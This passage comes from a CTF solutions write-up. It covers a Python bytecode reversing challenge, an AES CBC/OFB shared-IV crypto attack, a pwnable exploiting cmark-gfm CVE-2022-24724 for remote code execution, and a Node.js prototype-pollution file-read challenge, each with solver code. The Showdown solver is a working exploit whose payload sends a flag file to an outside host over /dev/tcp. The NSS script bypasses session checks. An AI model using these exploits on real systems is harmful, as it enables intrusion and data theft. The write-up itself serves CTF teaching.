26 LOAD_CONST 4 ((0, 0, 16, 0, 255, 1, 254, 0, 16, 0, 124, 1, 231, 3, 35, 2, 222, 53, 0, 0, 0, 0, 0, 0, 0, 2, 24, 2, 221, 3, 196, 6, 115, 2, 225, 1, 184, 2, 25, 1, 197, 6, 0, 1, 24, 5, 25, 4, 24, 7, 248, 7, 125, 7, 1, 4, 24, 9, 25, 3, 99, 0, 16, 7, 98, 5, 91, 9, 255, 3, 231, 5, 255, 0, 101, 8, 16, 3, 149, 0, 67, 8, 54, 7, 16, 0, 60, 0, 231, 6, 53, 8, 35, 6, 32, 2, 57, 8, 253, 0, 106, 1, 1, 9, 0, 9, 196, 11, 107, 1, 24, 9, 196, 2, 184, 1, 22, 0, 12, 48, 5, 2, 0, 8, 208, 1))
28 LIST_EXTEND 1
30 STORE_NAME 3 (m)
7 32 LOAD_CONST 5 (<code object chk at 0x7f2adab20a80, file "main.py", line 7>)
34 LOAD_CONST 6 ('chk')
36 MAKE_FUNCTION 0
38 STORE_NAME 4 (chk)
22 40 LOAD_NAME 5 (input)
42 CALL_FUNCTION 0
44 LOAD_METHOD 6 (encode)
46 CALL_METHOD 0
48 STORE_NAME 7 (ipt)
24 50 LOAD_CONST 0 (0)
52 LOAD_CONST 1 (None)
54 IMPORT_NAME 8 (ctypes)
56 STORE_NAME 8 (ctypes)
25 58 LOAD_CONST 7 (<code object throw at 0x7f2adab21630, file "main.py", line 25>)
60 LOAD_CONST 8 ('throw')
62 MAKE_FUNCTION 0
64 STORE_NAME 9 (throw)
44 66 SETUP_FINALLY 28 (to 124)
45 68 LOAD_NAME 7 (ipt)
70 LOAD_METHOD 10 (find)
72 LOAD_CONST 9 ('GoN{')
74 CALL_METHOD 1
76 LOAD_CONST 10 (-1)
78 COMPARE_OP 3 (!=)
80 POP_JUMP_IF_FALSE 56 (to 112)
82 LOAD_NAME 4 (chk)
84 LOAD_NAME 7 (ipt)
86 CALL_FUNCTION 1
88 LOAD_NAME 11 (bytes)
90 LOAD_NAME 1 (k)
92 CALL_FUNCTION 1
94 COMPARE_OP 2 (==)
96 POP_JUMP_IF_FALSE 59 (to 118)
46 98 LOAD_NAME 12 (print)
100 LOAD_CONST 11 ('Good!')
102 CALL_FUNCTION 1
104 POP_TOP
106 POP_BLOCK
108 LOAD_CONST 1 (None)
110 RETURN_VALUE
45 >> 112 POP_BLOCK
114 LOAD_CONST 1 (None)
116 RETURN_VALUE
>> 118 POP_BLOCK
120 LOAD_CONST 1 (None)
122 RETURN_VALUE
47 >> 124 POP_TOP
126 POP_TOP
128 POP_TOP
48 130 LOAD_NAME 9 (throw)
132 CALL_FUNCTION 0
134 POP_TOP
136 POP_EXCEPT
138 LOAD_CONST 1 (None)
140 RETURN_VALUE
Disassembly of <code object chk at 0x7f2adab20a80, file "main.py", line 7>:
8 0 LOAD_GLOBAL 0 (range)
2 LOAD_CONST 1 (3)
4 CALL_FUNCTION 1
6 STORE_FAST 1 (i)
9 8 LOAD_GLOBAL 1 (len)
10 LOAD_CONST 1 (3)
12 LOAD_CONST 2 (4)
14 BUILD_LIST 2
16 CALL_FUNCTION 1
18 STORE_FAST 1 (i)
10 20 LOAD_GLOBAL 2 (int)
22 LOAD_METHOD 3 (from_bytes)
24 LOAD_FAST 2 (r0)
26 LOAD_CONST 3 ('little')
28 CALL_METHOD 2
30 LOAD_METHOD 4 (to_bytes)
32 LOAD_CONST 2 (4)
34 LOAD_CONST 3 ('little')
36 CALL_METHOD 2
38 STORE_FAST 2 (r0)
11 40 LOAD_CONST 4 (16)
42 STORE_FAST 3 (r1)
12 44 LOAD_CONST 5 (32)
46 STORE_FAST 4 (r2)
13 48 LOAD_CONST 6 (4294967295)
50 STORE_FAST 5 (r3)
14 52 LOAD_CONST 7 (3735928559)
54 STORE_FAST 6 (r4)
15 56 LOAD_CONST 8 ('Good!')
58 STORE_FAST 7 (r5)
16 60 LOAD_GLOBAL 0 (range)
62 LOAD_GLOBAL 2 (int)
64 LOAD_GLOBAL 5 (str)
66 LOAD_CONST 9 ('3')
68 CALL_FUNCTION 1
70 CALL_FUNCTION 1
72 CALL_FUNCTION 1
74 STORE_FAST 8 (res)
17 76 LOAD_GLOBAL 6 (list)
78 CALL_FUNCTION 0
80 STORE_FAST 8 (res)
18 82 LOAD_GLOBAL 7 (zip)
84 LOAD_GLOBAL 6 (list)
86 LOAD_FAST 0 (ipt)
88 CALL_FUNCTION 1
90 LOAD_GLOBAL 8 (key)
92 CALL_FUNCTION 2
94 GET_ITER
>> 96 FOR_ITER 11 (to 120)
98 UNPACK_SEQUENCE 2
100 STORE_FAST 1 (i)
102 STORE_FAST 9 (j)
19 104 LOAD_FAST 8 (res)
106 LOAD_METHOD 9 (append)
108 LOAD_FAST 1 (i)
110 LOAD_FAST 9 (j)
112 BINARY_XOR
114 CALL_METHOD 1
116 POP_TOP
118 JUMP_ABSOLUTE 48 (to 96)
20 >> 120 LOAD_GLOBAL 10 (bytes)
122 LOAD_FAST 8 (res)
124 CALL_FUNCTION 1
126 RETURN_VALUE
Disassembly of <code object throw at 0x7f2adab21630, file "main.py", line 25>:
26 0 JUMP_ABSOLUTE 3 (to 6)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.10/dis.py", line 79, in dis
_disassemble_recursive(x, file=file, depth=depth)
File "/usr/lib/python3.10/dis.py", line 384, in _disassemble_recursive
_disassemble_recursive(x, file=file, depth=depth)
File "/usr/lib/python3.10/dis.py", line 376, in _disassemble_recursive
disassemble(co, file=file)
File "/usr/lib/python3.10/dis.py", line 372, in disassemble
_disassemble_bytes(co.co_code, lasti, co.co_varnames, co.co_names,
File "/usr/lib/python3.10/dis.py", line 404, in _disassemble_bytes
for instr in _get_instructions_bytes(code, varnames, names,
File "/usr/lib/python3.10/dis.py", line 340, in _get_instructions_bytes
argval, argrepr = _get_name_info(arg, names)
File "/usr/lib/python3.10/dis.py", line 304, in _get_name_info
argval = name_list[name_index]
IndexError: tuple index out of range
```
With lazy analysis and little guessing, In chk function, there are bunch of useless code and do character wise xor with `ipt` and `key` and later compare with `k`.
```
>>> for i, j in zip(prob.key, prob.k):
... ans += chr(i ^ j)
...
>>> ans
'NoD{No!_Th15_1s_N0t_Fl4G_Y0U_n33d_t0_rev_more!@#}'
```
[Meme](https://www.youtube.com/watch?v=GPXkjtpGCFI)
With little more looking at bytecode, you can easily know that code is seriously wrong.
```python
...
ipt = input().encode()
...
try:
if ipt.find("GoN{") != -1 and chk(ipt) == bytes(k):
print("Good!")
except:
throw()
```
Type of `ipt` will be `bytes`, but uses find with string. That will throw exception and call `throw` function.
We need to look at throw funtion, but while `dis` disassembling `throw` function, it pops error.
Let's lookup the throw's bytecode
```
0 JUMP_ABSOLUTE (to 6)
2 LOAD_NAME (255)
4 <255>
6 NOP
...
```
There is `LOAD_NAME 255` and try to load the real name from function name table, but `prob.throw.__code__.co_names` length is only 17. So that's why `dis` pops IndexError.
There is more better disassembler, [xdis](https://github.com/rocky/python-xdis). This shows much better code and no errors.
Here is a result of xdis. (only `throw`)
```
# Method Name: throw
# Filename: main.py
# Argument count: 0
# Position-only argument count: 0
# Keyword-only arguments: 0
# Number of locals: 5
# Stack size: 5
# Flags: 0x00000043 (NOFREE | NEWLOCALS | OPTIMIZED)
# First Line: 25
# Constants:
# 0: None
# 1: 1
# 2: 32
# 3: 8
# Names:
# 0: ctypes
# 1: c_char
# 2: len
# 3: m
# 4: from_address
# 5: id
# 6: chk
# 7: __code__
# 8: co_code
# 9: zip
# 10: raw
# 11: append
# 12: bytes
# 13: ipt
# 14: k
# 15: print
# 16: co_consts
# Varnames:
# a, ptr1, res, i, j
# Local variables:
# 0: a
# 1: ptr1
# 2: res
# 3: i
# 4: j
25: 0 JUMP_ABSOLUTE (to 6)
2 LOAD_NAME (255)
26: 4 <255> 9
>> 6 NOP
27: 8 LOAD_GLOBAL (ctypes)
10 LOAD_ATTR (c_char)
12 LOAD_GLOBAL (len)
14 LOAD_GLOBAL (m)
16 CALL_FUNCTION 1
18 BINARY_MULTIPLY
20 LOAD_METHOD (from_address)
22 LOAD_GLOBAL (id)
24 LOAD_GLOBAL (chk)
26 LOAD_ATTR (__code__)
28 LOAD_ATTR (co_code)
30 CALL_FUNCTION 1
32 LOAD_CONST (32)
34 BINARY_ADD
36 CALL_METHOD 1
38 STORE_FAST (ptr1)
29: 40 BUILD_LIST 0
42 STORE_FAST (res)
31: 44 LOAD_GLOBAL (zip)
46 LOAD_FAST (ptr1)
48 LOAD_ATTR (raw)
50 LOAD_GLOBAL (m)
52 CALL_FUNCTION 2
54 GET_ITER
>> 56 FOR_ITER (to 138)
58 UNPACK_SEQUENCE 2
60 STORE_FAST (i)
62 STORE_FAST (j)
32: 64 LOAD_FAST (res)
66 LOAD_METHOD (append)
68 LOAD_FAST (i)
70 LOAD_FAST (j)
72 BINARY_XOR
74 CALL_METHOD 1
76 POP_TOP
78 JUMP_ABSOLUTE (to 56)
33: >> 80 LOAD_GLOBAL (bytes)
82 LOAD_FAST (res)
84 CALL_FUNCTION 1
86 LOAD_FAST (ptr1)
88 STORE_ATTR (raw)
34: 90 LOAD_GLOBAL (chk)
92 LOAD_GLOBAL (ipt)
94 CALL_FUNCTION 1
96 LOAD_GLOBAL (bytes)
98 LOAD_GLOBAL (k)
100 CALL_FUNCTION 1
102 COMPARE_OP (==)
104 POP_JUMP_IF_FALSE (to 122)
36: 106 LOAD_GLOBAL (print)
108 LOAD_GLOBAL (chk)
110 LOAD_ATTR (__code__)
112 LOAD_ATTR (co_consts)
114 LOAD_CONST (8)
116 BINARY_SUBSCR
118 CALL_FUNCTION 1
120 POP_TOP
37: >> 122 BUILD_LIST 0
124 STORE_FAST (res)
39: 126 LOAD_GLOBAL (zip)
128 LOAD_FAST (ptr1)
130 LOAD_ATTR (raw)
132 LOAD_GLOBAL (m)
134 CALL_FUNCTION 2
136 GET_ITER
>> 138 FOR_ITER (to 302)
140 UNPACK_SEQUENCE 2
142 STORE_FAST (i)
144 STORE_FAST (j)
40: 146 LOAD_FAST (res)
148 LOAD_METHOD (append)
150 LOAD_FAST (i)
152 LOAD_FAST (j)
154 BINARY_XOR
156 CALL_METHOD 1
158 POP_TOP
160 JUMP_ABSOLUTE (to 138)
41: >> 162 LOAD_GLOBAL (bytes)
164 LOAD_FAST (res)
166 CALL_FUNCTION 1
168 LOAD_FAST (ptr1)
170 STORE_ATTR (raw)
172 LOAD_CONST (None)
174 RETURN_VALUE
```
Decompile this results,
```python=
def throw():
ptr1 = (ctypes.c_char * len(m)).from_address(id(chk.__code__.co_code) + 32)
res = []
for i, j in zip(ptr1.raw, m):
res.append(i^j)
ptr1.raw = bytes(res)
if chk(ipt) == bytes(k):
print(chk.__code__.co_consts[8])
res = []
for i, j in zip(ptr1.raw, m):
res.append(i^j)
ptr1.raw = bytes(res)
```
This performs xor to data in address chk.__code__.co_code+32 and m, results modifying the code of chk. After that, it calls chk with your input and compare with k. And it restore to original code. (For not allowing the easy way, do `dis.dis(throw)` after `improt prob`)
We can restore the modified code doing the same thing.
```
>>> import ctypes
>>> ptr1 = (ctypes.c_char * len(prob.m)).from_address(id(prob.chk.__code__.co_code) + 32)
>>> res = []
>>> for i, j in zip(ptr1.raw, prob.m):
... res.append(i^j)
>>> ptr1.raw = bytes(res)
>>> import dis
>>> dis.dis(prob.chk)
```
There you go. I'll pass talking about decompiled modified prob.chk and get reverse function.
</details>
<details>
<summary>Solver Code</summary>
```python=
import struct
k = [161, 55, 37, 106, 136, 128, 88, 143, 139, 247, 182, 192, 140, 132, 222, 141, 79, 38, 69, 75, 184, 232, 66, 72, 152, 14, 202, 49, 143, 58, 194, 161, 241, 230, 237, 118, 254, 112, 85, 32, 220, 192, 179, 201, 216, 132, 141, 42, 53]
def solve(ipt):
for i in range(len(ipt) - 3):
i = len(ipt) - 4 - i
r0 = int.from_bytes(ipt[i:i+4], "little") ^ 0xDEADBEEF
ipt = ipt[:i] + ((((r0 << ((i + 16) % 32)) | (r0 >> ((16 - i) % 32))) & 0xFFFFFFFF)).to_bytes(4, "little") + ipt[i+4:]
return ipt
print(solve(bytes(k)))
```
</details>
## O. Interchange
Category: Crypto\
Author: [c0m0r1]\
Solvers: 33
<details>
<summary>Description</summary>
μΈλνλ€.
κ°μ΄μ λΉμκ° λ μμ κ½νλ€.
νμ§λ§ κ±±μ νμ§ λ§λΌ.
μ½λλβ¦ λλ³΄λ€ λΉ λ₯΄λκΉ.
(*Encryptor Switched)
(For foreigners: it's homage to [famous scene](https://www.youtube.com/watch?v=XtqIpsPf5Mg) in [korean movie](https://en.wikipedia.org/wiki/Tazza:_The_High_Rollers))
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about block cipher operation modes (especially CBC and OFB)
1. **Objective** - Understand how to break AES-CBC/OFB cipher weakened by sharing iv
read [this paper](https://eprint.iacr.org/2007/385.pdf) and everyone should understand exploit :)
summary for who doesn't want to read: encrypt "0" in CBC, then xor it with OFB-encrypted flag ciphertext
</details>
<details>
<summary>Solver Code</summary>
```
#!/usr/bin/python3
from pwn import *
context.log_level = "DEBUG"
BS = 16
unpad = lambda s : s[0:-s[-1]]
IP = "127.0.0.1"
PORT = 13111
p = remote(IP, PORT)
p.sendlineafter(">> ", "1")
p.sendlineafter(">> ", "\x00" * 0x1000)
ct_cbc = bytes.fromhex(p.recvline().split(b":")[-1].strip().decode())
p.sendlineafter(">> ", "3")
p.sendlineafter(">> ", "3")
p.sendlineafter(">> ", "2")
ct_cfb = bytes.fromhex(p.recvline().split(b":")[-1].strip().decode())
cbc_iv = ct_cbc[:BS]
cfb_iv = ct_cfb[:BS]
assert(cbc_iv == cfb_iv)
ans_li = []
for i in range(len(ct_cfb)):
ans_li.append(ct_cbc[i] ^ ct_cfb[i])
flag = unpad(bytes(ans_li[BS:])).decode()
print(flag)
p.interactive()
```
</details>
## P. Showdown
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
Enjoy our super-fast GitHub Flavored Markdown renderer service `Showdown!`
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Exploit cmark-gfm with [CVE-2022-24724]
Flask server with simple front/backend is given. [cmark-gfm](https://github.com/github/cmark-gfm) library ver 0.29.0.gfm.2 is used natively by ctypes.
Checking out Github advisories we see [CVE-2022-24724], which affects the version used by the server.
Vulnerability is rather simple: table column counts are `uint16_t` and column counts of header and marker row must be equal. Overflowing this on the marker row results in OOB heap access when setting alignments.
[extensions/table.c#L164](https://github.com/github/cmark-gfm/blob/0.29.0.gfm.2/extensions/table.c#L164):
```c=146
if (cell_matched || pipe_matched) {
// We are guaranteed to have a cell, since (1) either we found some
// content and cell_matched, or (2) we found an empty cell followed by a
// pipe.
cmark_strbuf *cell_buf = unescape_pipes(parser->mem, string + offset,
cell_matched);
cmark_strbuf_trim(cell_buf);
node_cell *cell = (node_cell *)parser->mem->calloc(1, sizeof(*cell));
cell->buf = cell_buf;
cell->start_offset = offset;
cell->end_offset = offset + cell_matched - 1;
while (cell->start_offset > 0 && string[cell->start_offset - 1] != '|') {
--cell->start_offset;
++cell->internal_offset;
}
row->n_columns += 1;
row->cells = cmark_llist_append(parser->mem, row->cells, cell);
}
```
[extensions/table.c#L284](https://github.com/github/cmark-gfm/blob/0.29.0.gfm.2/extensions/table.c#L284):
```c=284
uint8_t *alignments =
(uint8_t *)parser->mem->calloc(header_row->n_columns, sizeof(uint8_t));
cmark_llist *it = marker_row->cells;
for (i = 0; it; it = it->next, ++i) {
node_cell *node = (node_cell *)it->data;
bool left = node->buf->ptr[0] == ':', right = node->buf->ptr[node->buf->size - 1] == ':';
if (left && right)
alignments[i] = 'c';
else if (left)
alignments[i] = 'l';
else if (right)
alignments[i] = 'r';
}
```
To exploit this we must check how heap allocations are done:
1. Heap allocations are done through a custom arena allocator, which allocates arenas of size starting from 0x400000 and multiplies by 1.5 for each new arenas. These arenas are allocated by glibc `calloc()`.
2. Requested allocations are split from the arena top.
3. Free is a no-op, since at end of parsing and rendering all the allocated arenas are freed.
4. `MMAP_THRESHOLD` is fixed to 0x20000. This guarantees consistent allocation behavior over multiple renders (always mmap-ed) instead of the threshold being dynamically increased (allocated on heap).
For players' convenience, after 5 consecutive "Proof of Address Leak" address of arena allocator structure is given by the server.
The exploit plan is simple:
1. Get an address leak using the OOB
2. Exploit `cmark_strbuf_free()` with forged `mem` & `ptr`
To leak an address we must use the OOB to partially overwrite `ptr` of a `cmark_strbuf` to be rendered. Using the fact that consecutive mmap chunks will grow downwards, we can place the alignment array at the top of an arena to overwrite an object at the bottom of prev arena.
Gaining RCE is much harder. Players are expected to encounter these challenges:
1. OOB writes are only possible with 'c', 'l' and 'r'.
2. It is hard to write an address (`system`) on arena due to null byte; these are replaced with U+FFFD immediately at parser feed
3. It is also hard to spray addresses on arena (without tables) using objects such as `cmark_strbuf`; inlines are parsed at document finalization.
4. `cmark_strbuf` can be sprayed with table cells, but `re2c`-generated parser only accept valid UTF8 string.
5. Considering the following allocations of a table (excluding small allocations), it is hard to OOB write into a `cmark_strbuf` that will be freed with `cmark_strbuf_free()`:
1. Defunct marker_row that should've been popped from arena, probably a memory leak bug - 0x68 at minimum for each cell
2. Parsed marker_row - 0x68 at minimum for each cell
3. Parsed header_row - 0x68 at minimum for each cell
4. **alignment** array
5. header_row made into nodes for render - 0xf0 at minimum for each cell
For the above only 2, 3 are freed, and these are freed through `free_table_row()` immediately at the end of `try_opening_table_header()`; **we can only trigger `cmark_strbuf_free()` on forged `cmark_strbuf` by OOB write into own table**.
Considering memory limits (256MB), time limits (table cell insertion takes `O(N^2)` for number of cells `N` for each row) and the above constraints, we must calculate the exact number of header and marker row cells to place address "sprays" and alignment exactly on the desired place.
By rough computation and binary searching the number of cells for desired layout, the solution uses 0x24720 header cells and 0x14720 marker cells.
Since leak is given, we brute force until `system` address is a UTF8-decodable address and partially overwriting arena allocator struct address can point to our payload. This in total requires about 800 attempts.
This solution is best understood through computing the arena layout by oneself, so try it out using the solver code as a reference.
</details>
<details>
<summary>Solver Code</summary>
```python=3
#!/usr/bin/env python3
from pwn import *
import requests
import itertools, bisect
from time import sleep
libc = ELF('./libc-2.31.so')
libgfm = ELF('../public/app/libs/libcmark-gfm.so.0.29.0.gfm.2')
libgfm_ext = ELF('../public/app/libs/libcmark-gfm-extensions.so.0.29.0.gfm.2')
url = 'http://127.0.0.1:56925'
LHOST, LPORT = 'REDACTED', 12345
def targlen(l):
if l % 3 == 0:
l -= 1
return l * 2 // 3 - 1
def clr(c):
if isinstance(c, int):
c = bytes([c])
if c == b'c':
return b':-:'
elif c == b'l':
return b':--'
elif c == b'r':
return b'--:'
assert False
leak_ctr = 0
if 'Nope!' != requests.get(url + '/chal/leak').text:
leak_ctr = 5
# Step 1. Leak
while leak_ctr < 5:
try:
res = requests.post(url + '/reload')
except requests.exceptions.ConnectionError:
pass
for i in range(10):
try:
requests.get(url + '/')
except requests.exceptions.ConnectionError:
sleep(0.2)
else:
break
code = ''
SIZE_FILL = 0x100
code += '|'
code += 'Z'*0x637b0 + '|'
for i in range(SIZE_FILL-2):
code += f'{i}|'
code += 'B'*0x42 + '|\n'
code += '|' + '-|' * SIZE_FILL + '\n\n'
SIZE = 0x1988
code += '|'
for i in range(SIZE):
code += f'{i}|'
code += '\n'
markers = ['--'] * (0x10000 + SIZE)
markers[0x3690] = ':-'
for i in range(0x6c, 0xa8):
markers[0x3740 + i] = ":-"
code += '|' + '|'.join(markers) + '|\n\n'
try:
res = requests.post(
url + '/render',
data=code,
headers={'Content-Type': 'text/markdown'},
timeout=60
).content
except requests.exceptions.Timeout:
log.warning('Leak failed (no response in 60s), retry...')
continue
leakidx = res.find(b'l'*(0xa8-0x6c))
if leakidx < 0:
log.warning('Leak failed (marker not found), retry')
continue
leakidx += 0xa8-0x6c
if res[leakidx+6:leakidx+11] != b'</th>':
log.warning('Leak failed (addr leak len < 6), retry...')
continue
leak_addr = u64(res[leakidx:leakidx+6]+b'\0\0')
try:
requests.post(url + '/chal/proof_of_leak', data=str(leak_addr))
except requests.exceptions.ConnectionError:
pass
leak_ctr += 1
log.success(f'leak counter: {leak_ctr}')
# Step 2. Pop shell
for i in range(10000):
log.info(f'Try {i}')
libc.address = 0
libgfm.address = 0
libgfm_ext.address = 0
try:
res = requests.post(url + '/reload')
except requests.exceptions.ConnectionError:
pass
for i in range(10):
try:
leak_addr = int(requests.get(url + '/chal/leak').text, 16)
except requests.exceptions.ConnectionError:
sleep(0.2)
else:
break
libgfm.address = leak_addr - libgfm.sym['CMARK_ARENA_MEM_ALLOCATOR']
assert libgfm.address & 0xfff == 0
log.success(f'libcmark-gfm : {libgfm.address:#014x}')
libc.address = libgfm.address + 0x1582000
log.info (f'libc : {libc.address:#014x}')
libgfm_ext.address = libgfm.address - 0xc000
log.info (f'libcmark-gfm-ext : {libgfm_ext.address:#014x}')
arena_base = libgfm_ext.address - 0x14000
log.info (f'arena base : {arena_base:#014x}')
if set(p64(libc.sym['system'])[:6]) & set(b'\x00\x0a\x0d\\|'):
log.warning('Banned char present in system addr, retry')
continue
try:
p64(libc.sym['system'])[:6].decode('utf-8')
except UnicodeDecodeError:
log.warning('Non-UTF8 system addr, retry')
continue
spray_base = arena_base
spray_base -= 0x401000
spray_base -= 0x601000
spray_base -= 0x901000
spray_base -= 0xd81000
spray_base += 0x18 + 0x68
spray_range = [spray_base + i * 0x68 for i in range(0x2471f - 0x3445)]
log.info(f'spray range : {spray_range[0]:#014x} ~ {spray_range[-1]:#014x}')
for hiword in itertools.product([b'c', b'l', b'r'], repeat=2):
hiword_p16 = b''.join(hiword)
cmd = u64(p16(0x6c72) + hiword_p16 + p32(libgfm.sym['CMARK_ARENA_MEM_ALLOCATOR'] >> 32))
cmd -= 2
sidx = bisect.bisect(spray_range, cmd) - 1
if sidx < 0:
continue
ofs = cmd - spray_range[sidx]
if ofs <= 0x70:
break
else:
log.warning('Not in range, retry')
continue
log.success(f'Snipe Index : {sidx}')
log.success(f'Snipe Address : {cmd:#014x}')
code = b''
arr = [b'']*0x24720
arr[0x3444] = b'z'*targlen(0x8 + ofs)
arr[-1] = b'z'*targlen(0x78 - ofs)
snipe = f'bash -c "cat ../flag >&/dev/tcp/{LHOST}/{LPORT}";#'.encode('ascii')
snipe = b'aa' + snipe.ljust(0x7282-0x6c72, b'a')
snipe += p64(libc.sym['system'])[:6]
arr[0x3445 + sidx] = snipe
code += b'|' + b'|'.join(arr) + b'|\n'
markers = [b'-'] * 0x14720
markers[0x5d50] = clr(0x72)
markers[0x5d51] = clr(0x72)
markers[0x5d52] = clr(hiword[0])
markers[0x5d53] = clr(hiword[1])
markers[0x5d58] = clr(0x72)
markers[0x5d59] = clr(0x6c)
markers[0x5d5a] = clr(hiword[0])
markers[0x5d5b] = clr(hiword[1])
code += b'|' + b'|'.join(markers) + b'|\n\n'
try:
requests.post(
url + '/render',
data=code,
headers={'Content-Type': 'text/markdown'},
timeout=30
)
except requests.exceptions.Timeout:
log.success('Exploit request timed out, enjoy your flag!')
else:
log.warning('Exploit request not timed out, retry')
continue
l = listen(LPORT)
conn = l.wait_for_connection()
print(conn.readall())
break
```
</details>
## Q. NSS
Category: Web\
Author: [c0m0r1]\
Solvers: 14
<details>
<summary>Description</summary>
The Simple and Secure Node.js Storage Service!
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about Node.js REST API server and object prototype in javascript.
1. **Objective** - Understand how prototype pollution occurs in vulnerable code and leverage it into LFI.
The main vulnerability of implementation is in `/api/users/:userid/:ws` endpoint (file.js#L78)
```javascript
const workspace = user.workspaces[ws_name];
if(!workspace)
return res.status(404).json({ok: false, err: "Failed to find workspace"});
if(!f_name || !f_path)
return res.status(400).json({ok: false, err: "Invalid file name or path"});
if(!write_b64_file(path.join(user.base_dir, f_path), f_content))
return res.status(500).json({ok: false, err: "Internal server error"});
workspace[f_name] = f_path;
return res.status(200).json({ok: true});
```
Since there's no any check routine exist, attacker can provide arbitrary key such as "`__proto__`" which can trigger prototype pollution.
```
ws_name == "__proto__" => workspace = user.workspaces["__proto__"] == Object.__proto__
workspace[f_name] = f_path => Object.__proto__.f_name = f_path
```
After some analysis, attacker can successfully override the base_dir of storage and bypass the session check to read flag.
</details>
<details>
<summary>Solver Code</summary>
```python=1
import requests
import json
import base64
URL = "http://127.0.0.1:3000"
ID = "c0m0r1"
PASS = "a" * 0x10
PWD = "/usr/src/app"
def send_post_req(url, data):
headers = {'Content-Type': 'application/json; chearset=utf-8'}
res = requests.post(url, data=json.dumps(data), headers=headers)
return res
def send_get_req(url, data):
headers = {'Content-Type': 'application/json; chearset=utf-8'}
res = requests.get(url, data=json.dumps(data), headers=headers)
return res
def PP(id, token, key, val):
headers = {'Content-Type': 'application/json; chearset=utf-8'}
data = {"token": token, "file_name":key, "file_path":val, "file_content":"a"}
res = send_post_req(URL + "/api/users/%s/%s"%(id,"__proto__"), data)
assert(res.status_code == 200)
res = send_post_req(URL + "/api/users", {"userid": ID, "pass": PASS})
assert(res.status_code == 200)
res = send_post_req(URL + "/api/users/auth", {"userid": ID, "pass": PASS})
assert(res.status_code == 200)
token = res.json()['token']
res = send_post_req(URL + "/api/users/%s"%ID, {"token": token, "ws_name":"test"})
assert(res.status_code == 200)
# Object.__proto__.base_dir = PWD
PP(ID, token, "base_dir", PWD)
# Object.__proto__.workspaces = Object
PP(ID, token, "workspaces", "some_str")
# Object.__proto__.fake_token = Object
PP(ID, token, "fake_token", "some_str")
# Object.__proto__.expire = 99999999999999
PP(ID, token, "expire", "99999999999999")
# Object.__proto__.owner = __proto__
PP(ID, token, "owner", "__proto__")
# Object.__proto__.thisisflagpath = flag
PP(ID, token, "thisisflagpath", "flag")
# with following request, the values will be
# userid == "__proto__"
# sess = tokens[token] == tokens["fake_token"] == Object.__proto__.fake_token == Object
# sess.owner == Object.__proto__.owner == "__proto__"
# sess.expire == Object.__proto__.expire == "99999999999999" (session bypassed)
# user = users[userid] == Object.__proto__
# workspaces = user.workspaces[ws_name] == Object.__proto__.__proto__
# f_path = workspace[f_name] == Object.__proto__.thisisflagpath == "flag"
# user.base_dir == Object.__proto__.base_dir == PWD
# ... finally read PWD + flag
res = send_get_req(URL + "/api/users/%s/%s/%s"%("__proto__","__proto__","thisisflagpath"), {"token": "fake_token"})
print(res.text)
flag = base64.b64decode(res.json()['file_content']).decode()
print("[+] flag : %s"%flag)
# i don't believe this is optimal exploit
# ... and i hope there's no unintended solution exist
```
</details>
[Xion]: https://twitter.com/0x10n
[okas832]: https://twitter.com/okascmy1
[c0m0r1]: https://twitter.com/c0m0r1
[HTTPS Session ID Poisoning]: https://i.blackhat.com/USA-20/Wednesday/us-20-Maddux-When-TLS-Hacks-You.pdf
[hxp CTF 2020 security scanner]: https://ctftime.org/writeup/25661
[Balsn CTF 2019 pyshv2]: https://ctftime.org/writeup/16723
[CVE-2021-32761]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-32761
[CVE-2022-24724]: https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x